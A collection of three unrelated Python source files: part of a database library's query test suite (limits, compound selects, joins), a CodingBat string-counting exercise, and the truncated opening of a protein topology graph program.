assert b in row
assert stmt.c.keyed2_a in row
assert stmt.c.keyed2_b in row
def test_columnclause_schema_column_five(self):
keyed2 = self.tables.keyed2
# this is also addressed by [ticket:2932]
stmt = text("select a AS keyed2_a, b AS keyed2_b from keyed2").columns(
keyed2_a=CHAR, keyed2_b=CHAR)
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert stmt.c.keyed2_a in row
assert stmt.c.keyed2_b in row
class LimitTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global users, addresses, metadata
metadata = MetaData(testing.db)
users = Table(
'query_users', metadata,
Column('user_id', INT, primary_key=True),
Column('user_name', VARCHAR(20)),
)
addresses = Table(
'query_addresses', metadata,
Column('address_id', Integer, primary_key=True),
Column('user_id', Integer, ForeignKey('query_users.user_id')),
Column('address', String(30)))
metadata.create_all()
users.insert().execute(user_id=1, user_name='john')
addresses.insert().execute(address_id=1, user_id=1, address='addr1')
users.insert().execute(user_id=2, user_name='jack')
addresses.insert().execute(address_id=2, user_id=2, address='addr1')
users.insert().execute(user_id=3, user_name='ed')
addresses.insert().execute(address_id=3, user_id=3, address='addr2')
users.insert().execute(user_id=4, user_name='wendy')
addresses.insert().execute(address_id=4, user_id=4, address='addr3')
users.insert().execute(user_id=5, user_name='laura')
addresses.insert().execute(address_id=5, user_id=5, address='addr4')
users.insert().execute(user_id=6, user_name='ralph')
addresses.insert().execute(address_id=6, user_id=6, address='addr5')
users.insert().execute(user_id=7, user_name='fido')
addresses.insert().execute(address_id=7, user_id=7, address='addr5')
@classmethod
def teardown_class(cls):
metadata.drop_all()
def test_select_limit(self):
r = users.select(limit=3, order_by=[users.c.user_id]).execute(). \
fetchall()
self.assert_(r == [(1, 'john'), (2, 'jack'), (3, 'ed')], repr(r))
@testing.requires.offset
def test_select_limit_offset(self):
"""Test the interaction between limit and offset"""
r = users.select(limit=3, offset=2, order_by=[users.c.user_id]). \
execute().fetchall()
self.assert_(r == [(3, 'ed'), (4, 'wendy'), (5, 'laura')])
r = users.select(offset=5, order_by=[users.c.user_id]).execute(). \
fetchall()
self.assert_(r == [(6, 'ralph'), (7, 'fido')])
def test_select_distinct_limit(self):
"""Test the interaction between limit and distinct"""
r = sorted(
[x[0] for x in select([addresses.c.address]).distinct().
limit(3).order_by(addresses.c.address).execute().fetchall()])
self.assert_(len(r) == 3, repr(r))
self.assert_(r[0] != r[1] and r[1] != r[2], repr(r))
@testing.requires.offset
@testing.fails_on('mssql', 'FIXME: unknown')
def test_select_distinct_offset(self):
"""Test the interaction between distinct and offset"""
r = sorted(
[x[0] for x in select([addresses.c.address]).distinct().
offset(1).order_by(addresses.c.address).
execute().fetchall()])
eq_(len(r), 4)
self.assert_(r[0] != r[1] and r[1] != r[2] and r[2] != [3], repr(r))
@testing.requires.offset
def test_select_distinct_limit_offset(self):
"""Test the interaction between limit and limit/offset"""
r = select([addresses.c.address]).order_by(addresses.c.address). \
distinct().offset(2).limit(3).execute().fetchall()
self.assert_(len(r) == 3, repr(r))
self.assert_(r[0] != r[1] and r[1] != r[2], repr(r))
class CompoundTest(fixtures.TestBase):
"""test compound statements like UNION, INTERSECT, particularly their
ability to nest on different databases."""
__backend__ = True
@classmethod
def setup_class(cls):
global metadata, t1, t2, t3
metadata = MetaData(testing.db)
t1 = Table(
't1', metadata,
Column(
'col1', Integer, test_needs_autoincrement=True,
primary_key=True),
Column('col2', String(30)),
Column('col3', String(40)),
Column('col4', String(30)))
t2 = Table(
't2', metadata,
Column(
'col1', Integer, test_needs_autoincrement=True,
primary_key=True),
Column('col2', String(30)),
Column('col3', String(40)),
Column('col4', String(30)))
t3 = Table(
't3', metadata,
Column(
'col1', Integer, test_needs_autoincrement=True,
primary_key=True),
Column('col2', String(30)),
Column('col3', String(40)),
Column('col4', String(30)))
metadata.create_all()
t1.insert().execute([
dict(col2="t1col2r1", col3="aaa", col4="aaa"),
dict(col2="t1col2r2", col3="bbb", col4="bbb"),
dict(col2="t1col2r3", col3="ccc", col4="ccc"),
])
t2.insert().execute([
dict(col2="t2col2r1", col3="aaa", col4="bbb"),
dict(col2="t2col2r2", col3="bbb", col4="ccc"),
dict(col2="t2col2r3", col3="ccc", col4="aaa"),
])
t3.insert().execute([
dict(col2="t3col2r1", col3="aaa", col4="ccc"),
dict(col2="t3col2r2", col3="bbb", col4="aaa"),
dict(col2="t3col2r3", col3="ccc", col4="bbb"),
])
@engines.close_first
def teardown(self):
pass
@classmethod
def teardown_class(cls):
metadata.drop_all()
def _fetchall_sorted(self, executed):
return sorted([tuple(row) for row in executed.fetchall()])
@testing.requires.subqueries
def test_union(self):
(s1, s2) = (
select([t1.c.col3.label('col3'), t1.c.col4.label('col4')],
t1.c.col2.in_(["t1col2r1", "t1col2r2"])),
select([t2.c.col3.label('col3'), t2.c.col4.label('col4')],
t2.c.col2.in_(["t2col2r2", "t2col2r3"]))
)
u = union(s1, s2)
wanted = [('aaa', 'aaa'), ('bbb', 'bbb'), ('bbb', 'ccc'),
('ccc', 'aaa')]
found1 = self._fetchall_sorted(u.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(u.alias('bar').select().execute())
eq_(found2, wanted)
@testing.fails_on('firebird', "doesn't like ORDER BY with UNIONs")
def test_union_ordered(self):
(s1, s2) = (
select([t1.c.col3.label('col3'), t1.c.col4.label('col4')],
t1.c.col2.in_(["t1col2r1", "t1col2r2"])),
select([t2.c.col3.label('col3'), t2.c.col4.label('col4')],
t2.c.col2.in_(["t2col2r2", "t2col2r3"]))
)
u = union(s1, s2, order_by=['col3', 'col4'])
wanted = [('aaa', 'aaa'), ('bbb', 'bbb'), ('bbb', 'ccc'),
('ccc', 'aaa')]
eq_(u.execute().fetchall(), wanted)
@testing.fails_on('firebird', "doesn't like ORDER BY with UNIONs")
@testing.requires.subqueries
def test_union_ordered_alias(self):
(s1, s2) = (
select([t1.c.col3.label('col3'), t1.c.col4.label('col4')],
t1.c.col2.in_(["t1col2r1", "t1col2r2"])),
select([t2.c.col3.label('col3'), t2.c.col4.label('col4')],
t2.c.col2.in_(["t2col2r2", "t2col2r3"]))
)
u = union(s1, s2, order_by=['col3', 'col4'])
wanted = [('aaa', 'aaa'), ('bbb', 'bbb'), ('bbb', 'ccc'),
('ccc', 'aaa')]
eq_(u.alias('bar').select().execute().fetchall(), wanted)
@testing.crashes('oracle', 'FIXME: unknown, verify not fails_on')
@testing.fails_on(
'firebird',
"has trouble extracting anonymous column from union subquery")
@testing.fails_on('mysql', 'FIXME: unknown')
@testing.fails_on('sqlite', 'FIXME: unknown')
def test_union_all(self):
e = union_all(
select([t1.c.col3]),
union(
select([t1.c.col3]),
select([t1.c.col3]),
)
)
wanted = [('aaa',), ('aaa',), ('bbb',), ('bbb',), ('ccc',), ('ccc',)]
found1 = self._fetchall_sorted(e.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(e.alias('foo').select().execute())
eq_(found2, wanted)
def test_union_all_lightweight(self):
"""like test_union_all, but breaks the sub-union into
a subquery with an explicit column reference on the outside,
more palatable to a wider variety of engines.
"""
u = union(
select([t1.c.col3]),
select([t1.c.col3]),
).alias()
e = union_all(
select([t1.c.col3]),
select([u.c.col3])
)
wanted = [('aaa',), ('aaa',), ('bbb',), ('bbb',), ('ccc',), ('ccc',)]
found1 = self._fetchall_sorted(e.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(e.alias('foo').select().execute())
eq_(found2, wanted)
@testing.requires.intersect
def test_intersect(self):
i = intersect(
select([t2.c.col3, t2.c.col4]),
select([t2.c.col3, t2.c.col4], t2.c.col4 == t3.c.col3)
)
wanted = [('aaa', 'bbb'), ('bbb', 'ccc'), ('ccc', 'aaa')]
found1 = self._fetchall_sorted(i.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(i.alias('bar').select().execute())
eq_(found2, wanted)
@testing.requires.except_
@testing.fails_on('sqlite', "Can't handle this style of nesting")
def test_except_style1(self):
e = except_(union(
select([t1.c.col3, t1.c.col4]),
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
), select([t2.c.col3, t2.c.col4]))
wanted = [('aaa', 'aaa'), ('aaa', 'ccc'), ('bbb', 'aaa'),
('bbb', 'bbb'), ('ccc', 'bbb'), ('ccc', 'ccc')]
found = self._fetchall_sorted(e.alias().select().execute())
eq_(found, wanted)
@testing.requires.except_
def test_except_style2(self):
# same as style1, but add alias().select() to the except_().
# sqlite can handle it now.
e = except_(union(
select([t1.c.col3, t1.c.col4]),
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select(), select([t2.c.col3, t2.c.col4]))
wanted = [('aaa', 'aaa'), ('aaa', 'ccc'), ('bbb', 'aaa'),
('bbb', 'bbb'), ('ccc', 'bbb'), ('ccc', 'ccc')]
found1 = self._fetchall_sorted(e.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(e.alias().select().execute())
eq_(found2, wanted)
@testing.fails_on('sqlite', "Can't handle this style of nesting")
@testing.requires.except_
def test_except_style3(self):
# aaa, bbb, ccc - (aaa, bbb, ccc - (ccc)) = ccc
e = except_(
select([t1.c.col3]), # aaa, bbb, ccc
except_(
select([t2.c.col3]), # aaa, bbb, ccc
select([t3.c.col3], t3.c.col3 == 'ccc'), # ccc
)
)
eq_(e.execute().fetchall(), [('ccc',)])
eq_(e.alias('foo').select().execute().fetchall(), [('ccc',)])
@testing.requires.except_
def test_except_style4(self):
# aaa, bbb, ccc - (aaa, bbb, ccc - (ccc)) = ccc
e = except_(
select([t1.c.col3]), # aaa, bbb, ccc
except_(
select([t2.c.col3]), # aaa, bbb, ccc
select([t3.c.col3], t3.c.col3 == 'ccc'), # ccc
).alias().select()
)
eq_(e.execute().fetchall(), [('ccc',)])
eq_(
e.alias().select().execute().fetchall(),
[('ccc',)]
)
@testing.requires.intersect
@testing.fails_on('sqlite', "sqlite can't handle leading parenthesis")
def test_intersect_unions(self):
u = intersect(
union(
select([t1.c.col3, t1.c.col4]),
select([t3.c.col3, t3.c.col4]),
),
union(
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select()
)
wanted = [('aaa', 'ccc'), ('bbb', 'aaa'), ('ccc', 'bbb')]
found = self._fetchall_sorted(u.execute())
eq_(found, wanted)
@testing.requires.intersect
def test_intersect_unions_2(self):
u = intersect(
union(
select([t1.c.col3, t1.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select(),
union(
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select()
)
wanted = [('aaa', 'ccc'), ('bbb', 'aaa'), ('ccc', 'bbb')]
found = self._fetchall_sorted(u.execute())
eq_(found, wanted)
@testing.requires.intersect
def test_intersect_unions_3(self):
u = intersect(
select([t2.c.col3, t2.c.col4]),
union(
select([t1.c.col3, t1.c.col4]),
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select()
)
wanted = [('aaa', 'bbb'), ('bbb', 'ccc'), ('ccc', 'aaa')]
found = self._fetchall_sorted(u.execute())
eq_(found, wanted)
@testing.requires.intersect
def test_composite_alias(self):
ua = intersect(
select([t2.c.col3, t2.c.col4]),
union(
select([t1.c.col3, t1.c.col4]),
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select()
).alias()
wanted = [('aaa', 'bbb'), ('bbb', 'ccc'), ('ccc', 'aaa')]
found = self._fetchall_sorted(ua.select().execute())
eq_(found, wanted)
t1 = t2 = t3 = None
class JoinTest(fixtures.TestBase):
"""Tests join execution.
The compiled SQL emitted by the dialect might be ANSI joins or
theta joins ('old oracle style', with (+) for OUTER). This test
tries to exercise join syntax and uncover any inconsistencies in
`JOIN rhs ON lhs.col=rhs.col` vs `rhs.col=lhs.col`. At least one
database seems to be sensitive to this.
"""
__backend__ = True
@classmethod
def setup_class(cls):
global metadata
global t1, t2, t3
metadata = MetaData(testing.db)
t1 = Table('t1', metadata,
Column('t1_id', Integer, primary_key=True),
Column('name', String(32)))
t2 = Table('t2', metadata,
Column('t2_id', Integer, primary_key=True),
Column('t1_id', Integer, ForeignKey('t1.t1_id')),
Column('name', String(32)))
t3 = Table('t3', metadata,
Column('t3_id', Integer, primary_key=True),
Column('t2_id', Integer, ForeignKey('t2.t2_id')),
Column('name', String(32)))
metadata.drop_all()
metadata.create_all()
# t1.10 -> t2.20 -> t3.30
# t1.11 -> t2.21
# t1.12
t1.insert().execute({'t1_id': 10, 'name': 't1 #10'},
{'t1_id': 11, 'name': 't1 #11'},
{'t1_id': 12, 'name': 't1 #12'})
t2.insert().execute({'t2_id': 20, 't1_id': 10, 'name': 't2 #20'},
{'t2_id': 21, 't1_id': 11, 'name': 't2 #21'})
t3.insert().execute({'t3_id': 30, 't2_id': 20, 'name': 't3 #30'})
@classmethod
def teardown_class(cls):
metadata.drop_all()
def assertRows(self, statement, expected):
"""Execute a statement and assert that rows returned equal expected."""
found = sorted([tuple(row)
for row in statement.execute().fetchall()])
eq_(found, sorted(expected))
def test_join_x1(self):
"""Joins t1->t2."""
for criteria in (t1.c.t1_id == t2.c.t1_id, t2.c.t1_id == t1.c.t1_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id],
from_obj=[t1.join(t2, criteria)])
self.assertRows(expr, [(10, 20), (11, 21)])
def test_join_x2(self):
"""Joins t1->t2->t3."""
for criteria in (t1.c.t1_id == t2.c.t1_id, t2.c.t1_id == t1.c.t1_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id],
from_obj=[t1.join(t2, criteria)])
self.assertRows(expr, [(10, 20), (11, 21)])
def test_outerjoin_x1(self):
"""Outer joins t1->t2."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id],
from_obj=[t1.join(t2).join(t3, criteria)])
self.assertRows(expr, [(10, 20)])
def test_outerjoin_x2(self):
"""Outer joins t1->t2,t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
from_obj=[t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria)])
self.assertRows(
expr, [(10, 20, 30), (11, 21, None), (12, None, None)])
def test_outerjoin_where_x2_t1(self):
"""Outer joins t1->t2,t3, where on t1."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t1.c.name == 't1 #10',
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t1.c.t1_id < 12,
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30), (11, 21, None)])
def test_outerjoin_where_x2_t2(self):
"""Outer joins t1->t2,t3, where on t2."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t2.c.name == 't2 #20',
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t2.c.t2_id < 29,
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30), (11, 21, None)])
def test_outerjoin_where_x2_t3(self):
"""Outer joins t1->t2,t3, where on t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t3.c.name == 't3 #30',
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t3.c.t3_id < 39,
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
def test_outerjoin_where_x2_t1t3(self):
"""Outer joins t1->t2,t3, where on t1 and t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10', t3.c.name == 't3 #30'),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.t1_id < 19, t3.c.t3_id < 39),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
def test_outerjoin_where_x2_t1t2(self):
"""Outer joins t1->t2,t3, where on t1 and t2."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10', t2.c.name == 't2 #20'),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.t1_id < 12, t2.c.t2_id < 39),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30), (11, 21, None)])
def test_outerjoin_where_x2_t1t2t3(self):
"""Outer joins t1->t2,t3, where on t1, t2 and t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10',
t2.c.name == 't2 #20',
t3.c.name == 't3 #30'),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.t1_id < 19, t2.c.t2_id < 29, t3.c.t3_id < 39),
from_obj=[
(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
def test_mixed(self):
"""Joins t1->t2, outer t2->t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
print(expr)
self.assertRows(expr, [(10, 20, 30), (11, 21, None)])
def test_mixed_where(self):
"""Joins t1->t2, outer t2->t3, plus a where on each table in turn."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t1.c.name == 't1 #10',
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t2.c.name == 't2 #20',
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t3.c.name == 't3 #30',
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10', t2.c.name == 't2 #20'),
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t2.c.name == 't2 #20', t3.c.name == 't3 #30'),
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10',
t2.c.name == 't2 #20',
t3.c.name == 't3 #30'),
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
metadata = flds = None
class OperatorTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global metadata, flds
metadata = MetaData(testing.db)
flds = Table(
'flds', metadata,
Column(
'idcol', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('intcol', Integer),
Column('strcol', String(50)),
)
metadata.create_all()
flds.insert().execute([
dict(intcol=5, strcol='foo'),
dict(intcol=13, strcol='bar')
])
@classmethod
def teardown_class(cls):
metadata.drop_all()
# TODO: seems like more tests warranted for this setup.
def test_modulo(self):
eq_(
select([flds.c.intcol % 3],
order_by=flds.c.idcol).execute().fetchall(),
[(2,), (1,)]
)
@testing.requires.window_functions
def test_over(self):
eq_(
select([
flds.c.intcol, func.row_number().over(order_by=flds.c.strcol)
]).execute().fetchall(),
[(13, 1), (5, 2)]
)
|
# http://codingbat.com/prob/p164876
def cat_dog(str):
cat_count = 0
dog_count = 0
for i in range(len(str)-2):
if str[i:i+3] == "cat":
cat_count += 1
elif str[i:i+3] == "dog":
dog_count += 1
return (cat_count == dog_count)
|
#!/usr/bin/env python
###############################################################################
#
# ptgraph2.py - generate protein topology graphs from PDB atomic co-ordinates
# plus STRIDE or DSSP information.
#
# File: ptgraph2.py
# Author: Alex Stivala
# Created: July 2007
#
# $Id: ptgraph2.py 4642 2013-04-10 06:26:06Z astivala $
#
# ptgraph2 is a program to draw two-dimensional graph representations
# of protein topology. It reads information from STRIDE -h or DSSP
# output and writes a graph representation of the topological
# structure.
#
# Note, when using STRIDE, the 'private' stride options -\$ -i are also used,
# and in fact a modified version of stride is required (see
# ptsecstruct.py) which is supplied in the stride subdirectory.
#
# It is written in Python and depends on some Python libraries:
#
# . BioPython (including Bio.PDB)
# http://www.biopython.org
#
# Reference for Bio.PDB is:
# Hamelryck and Manderick 2003 "PDB parser and structure class implemented
# in Python" Bioinformatics 19:2308-2310
#
# which in turn depends on Numeric
# http://sourceforge.net/projects/numpy
#
# . (for the -h, -n and -d options; see ptgraphviz.py):
# pydot: python interface to GraphViz dot language (0.9.10)
# http://dkbza.org/pydot.html
#
# which in turn requires pyparsing
# http://pyparsing.sourceforge.net/
#
# For the -h, -n and -d options, GraphViz itself is also required (2.12)
# http://www.research.att.com/sw/tools/graphviz
#
# Instead of using GraphViz (dot/neato), the default output
# is now SVG for use with the Dunnart constraint-based
# diagram editor:
#
# http://www.csse.monash.edu.au/~mwybrow/dunnart/
#
# Dunnart (0.14+SVN) (revision 1469 {2007-08-16})
# has been modified to work with this by including
# strand and helix shapes, amongst other things (by Michael Wybrow).
# (Currently not generally available).
#
# Developed on Linux 2.6.9 (x86_64) with Python 2.5.1
# and BioPython 1.43 with Numeric 24.2
#
# Example usage:
#
# ptgraph2.py 1QLP.pdb
#
# Filenames may be either in the format above or the pdbq1lp.pdb format.
# Compressed pdb files are supported (gzip) (e.g. pdb1qlp.ent.gz).
# SCOP/ASTRAL domains in the format like d1qp3a_.ent are also supported,
# then the output filename has the same basename (eg d1qp3a_.svg).
#
###############################################################################
import warnings # so we can suppress the annoying tempnam 'security' warning
import sys,os
import getopt
from time import strftime,localtime
import re
from sets import Set # note not using builtin set, so we can use python 2.3
from Bio.PDB import *
from genseqid import GenSeqId
from ptsvgnode import *
from ptsvgcluster import *
from ptsvgconstraints import *
from ptdomain import *
from ptdistmatrix import PTDistMatrix, calc_sse_sse_dist
from ptrelpos import *
from ptmfile import *
import ptsecstruct
import pttableau
try:
import ptgraphviz
except:
sys.stderr.write('WARNING could not import graphviz interface: -h,-n,-d will not work\n')
# TODO: disable these options in this case
from color import color_gradient,rgb_tuple_to_hex_str,get_color_list,get_cluster_fill_colors,DUNNART_CLUSTER_ALPHA_HEX,get_glasbey_colors_rgb
from ptutils import cleanup_tmpdir,get_int_icode,biopdbresid_to_pdbresseq
from ptposmap import *
from ptversion import get_version
from getdomains import verify_domain_disjoint,build_domain_chaindict
#-----------------------------------------------------------------------------
#
# Module constants
#
#-----------------------------------------------------------------------------
# constants used in build_helices_svg() etc.
SEQPOS_AFTER = 1
SEQPOS_BEFORE = 2
# amount to multiply all co-ordinates by for uniform scaling
SCALE_FACTOR = 1.6
DEFAULT_SHAPE_COLOR_HEXSTR = 'f0f0d2' # beige; Dunnart default shape color
DEFAULT_DUNNART_STRAND_SEPARATION = 55 # space between strands in sheet
DEFAULT_DUNNART_MIN_GAP_SIZE = 55 # minimum space to leave between things
#-----------------------------------------------------------------------------
#
# Module globals
#
#-----------------------------------------------------------------------------
DUNNART_STRAND_SEPARATION = DEFAULT_DUNNART_STRAND_SEPARATION # space between strands in sheet
DUNNART_MIN_GAP_SIZE = DEFAULT_DUNNART_MIN_GAP_SIZE # minimum space to leave between things
#-----------------------------------------------------------------------------
#
# Class definitions
#
#-----------------------------------------------------------------------------
#
# Empty classes for exceptions
#
class NoSSE_Exception(Exception): # raised when no helices or strands found
pass
#
# Real classes
#
# class ChainPPBuilder(_PPBuilder):
# """
# This class inherits from the Bio.PDB _PPBuilder base class to
# build Polypeptide object using no distance criteria at all
# (Polypepetide.py provides classes for Ca-Ca or C-N distances).
# This is so we can just build sequential
# list of residues and ignore chain breaks: each chainid will have a
# single polypetide.
# """
# def __init__(self):
# __PPBuilder.__init__(self, radius=None)
# def _is_connected(self, prev, next):
# return 1 # always connected.
class PTGraph2:
"""
The topology graph consists of a sequence of structure (helix, strand)
nodes with edges in and out of them in sequence from N-terminus to
C-terminus. Note there may be multiple such sequences (one for each
chain).
Edges are also added for hydrogen bonds or bridge relationships
between strands.
"""
#
# member functions
#
def __init__(self, pdb_structure, use_hbonds=False,
include_310_helices = False, include_pi_helices = False):
"""
Construct empty PTGraph2. To build the graph call
build_graph_from_secstruct().
Parameters:
pdb_structure - parsed PDB structure from Bio.PDB
use_hbonds - If True make hydrogen bond graph instead of using
(modified) bridge partner information to make
sheets from strands.
include_310_helices - include 3_10 helices in the diagram if True
include_pi_helices - include pi_helices in the diagram if True
write_mfiles - write MATLAB m-files to plot strands
"""
self.pdb_struct = pdb_structure
self.chain_dict = None # Each value of the chain_dict is a
# List of nodes in order from N to C terminus
# so chain_dict is { chainid : node_list }
self.use_hbonds = use_hbonds # hbond mode
self.distmatrix = None # PTDistMatrix built in build_dist_matrix
self.ptrelpos = None # PTRelativePosition built in build_constraints
self.tableau = None # PTTableau build in build_tableau
self.include_310_helices = include_310_helices
self.include_pi_helices = include_pi_helices
self.pdb_resid_dict = None # dict of { {chainid,pdb_resseq) : seqindx }
# where chainid and pdb_resseq make up
# the PDB residue identifier, the pdb_resseq
# being string resnum+icode if any e.g.
# '60' or '60A', seqindx is the indiex
# into sequential list of all residues
# residue_list.
self.residue_list = None # list of all residues (for all chains)
# in sequence, built by get_residue_list()
def iter_chains(self):
"""
This generator function iterates over all chains in this PTGraph.
A chain is just a list of nodes so it yields a node list for each
chain.
Parameters: Nonde.
Return value: YIELDs a node list.
Uses data members (readony):
chain_dict - dict of {chainid:node_list}
"""
# FIXME: can we just 'return self.chain_dict.itervalues()' here?
for nodelist in self.chain_dict.itervalues():
yield nodelist
def iter_nodes(self):
"""
This generator function iterates over all the node in this PTGraph.
Parameters: None
Return Value: YIELDs a node.
Uses data members: (readonly):
chain_dict - dict of {chainid_node_list}
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
yield ptnode
def iter_strands(self):
"""
This generator function iterates over all strands in this PTGraph
object. I.e. it yields a strand for each strand in the
node lists.
Parameters: None.
Return value: YIELDs a strand.
Uses data members (readonly):
self.chain_dict - dict of { chainid : list of nodes }
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
if isinstance(ptnode, PTNodeStrand):
yield ptnode
def iter_helices(self):
"""
This generator function iterates over all helices in this PTGraph
object. I.e. it yields a PTNodeHelix for each helix in the
node lists.
NOTE: it excludes PI and/or 310 helices if the relevant option(s)
are set to exlclude them.
Parameters: None.
Return value: YIELDs a PTNodeHelix.
Uses data members (readonly):
self.chain_dict - dict of { chainid : list of nodes }
include_310_helices, include_pi_helices - flags to omit these
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
if isinstance(ptnode, PTNodeHelix):
if (not ( (ptnode.get_type() == "310" and
not self.include_310_helices) or
(ptnode.get_type() == "PI" and
not self.include_pi_helices) ) ):
yield ptnode
def get_num_helices(self):
"""
Return the total number of helices
NB: See NOTE on iter_helices() above re pi and 310 helices.
Parameters: None
Uses data members (readonly):
chain_dict - dictionary of {chainid : nodelist}
"""
num_helices = len(list(self.iter_helices()))
return num_helices
def largest_helix(self):
"""
Return the largest helix in this PTGraph, defined as the one
that spans the most residues.
Parameters: None.
Return value: PTNodeHelix of helix with most residues, or None.
Uses data members (readonly):
self.chain_dict - dict of { chainid : list of nodes }
"""
max_span = 0
max_span_helix = None
for helix in self.iter_helices():
span = helix.get_span()
if span > max_span:
max_span = span
max_span_helix = helix
return max_span_helix
def get_node_by_id(self, nodeid):
"""
Return the node in with the supplied id
Parameters:
